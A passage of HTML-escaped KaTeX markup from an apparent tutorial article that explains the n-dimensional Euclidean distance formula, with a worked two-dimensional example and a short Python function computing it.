style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; in an abstract &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;n&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;n&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.43056em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;n&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;-dimensional vector space, we&#39;d do this:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;munderover&gt;&lt;mo&gt;∑&lt;/mo&gt;&lt;mrow&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;mi&gt;n&lt;/mi&gt;&lt;/munderover&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d(p,q) = &#92;sqrt{&#92;sum_{i=1}^n(q_i - p_i)^2}
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:3.1568160000000005em;vertical-align:-1.277669em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.8791470000000006em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-5.116816em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:5.116816em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:1.056em;&quot;&gt;&lt;span class=&quot;mop op-limits&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.6513970000000002em;&quot;&gt;&lt;span style=&quot;top:-1.872331em;margin-left:0em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.05em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;mrel mtight&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.050005em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.05em;&quot;&gt;&lt;/span&gt;&lt;span&gt;&lt;span class=&quot;mop op-symbol large-op&quot;&gt;∑&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-4.3000050000000005em;margin-left:0em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.05em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;n&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.277669em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.31166399999999994em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;i&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span 
class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.31166399999999994em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;i&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.740108em;&quot;&gt;&lt;span style=&quot;top:-2.9890000000000003em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span 
style=&quot;top:-3.8391470000000005em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:5.116816em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:0.742em;height:3.196816em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;3.196816em&quot; viewBox=&quot;0 0 400000 3196&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M702 80H40000040
H742v3062l-4 4-4 4c-.667.7 -2 1.5-4 2.5s-4.167 1.833-6.5 2.5-5.5 1-9.5 1
h-12l-28-84c-16.667-52-96.667 -294.333-240-727l-212 -643 -85 170
c-4-3.333-8.333-7.667-13 -13l-13-13l77-155 77-156c66 199.333 139 419.667
219 661 l218 661zM702 80H400000v40H742z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.277669em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Don&#39;t worry - we&#39;ll go through this step by step. The big fancy sigma letter (&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi mathvariant=&quot;normal&quot;&gt;Σ&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;&#92;Sigma&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.68333em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;Σ&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;) makes this look quite confusing, but it&#39;s only saying that, for each dimension, we take the difference between our two points &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span 
class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and square it, add all of those squares together, then make &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; the square root of the total. We&#39;re popping it here now because later in the article we&#39;ll be contemplating vectors with hundreds of dimensions, and also it looks so cool.&lt;/p&gt;
&lt;/blockquote&gt;
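&lt;p&gt;If code reads more easily than notation, here is a minimal Python sketch of the formula above. The function name &lt;code&gt;euclidean_distance&lt;/code&gt; and the sample points are made up for this illustration rather than taken from any library: the generator inside &lt;code&gt;sum&lt;/code&gt; plays the role of the sigma, and &lt;code&gt;math.sqrt&lt;/code&gt; takes the square root of the total.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;import math


def euclidean_distance(p, q):
    # Hypothetical helper for illustration: p and q are equal-length
    # sequences of numbers, one entry per dimension.
    if len(p) != len(q):
        raise ValueError(len(p), len(q))
    # The sigma: square the difference in each dimension, then add them up.
    total = sum((q_i - p_i) ** 2 for p_i, q_i in zip(p, q))
    # d is the square root of that total.
    return math.sqrt(total)


# A 3-4-5 right triangle: sqrt(3**2 + 4**2) = sqrt(25)
print(euclidean_distance((0, 0), (3, 4)))  # 5.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because the generator runs once per dimension, the same sketch should work unchanged whether the points have two dimensions or hundreds.&lt;/p&gt;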
&lt;p&gt;Given &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p=(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo 
separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q=(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, we can calculate &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord 
mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; within a less generalised two-dimensional vector space. This makes &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;n&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;n = 2&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.43056em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;n&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.64444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, and our resulting formula becomes &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo 
stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d(p,q) = &#92;sqrt{(q_1 - p_1)^2 + (q_2 - p_2)^2}&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1.24em;vertical-align:-0.30499999999999994em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.935em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-3.2em;&quot;&gt;&lt;span 
class=&quot;pstrut&quot; style=&quot;height:3.2em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:1em;&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord 
mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.740108em;&quot;&gt;&lt;span style=&quot;top:-2.9890000000000003em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span 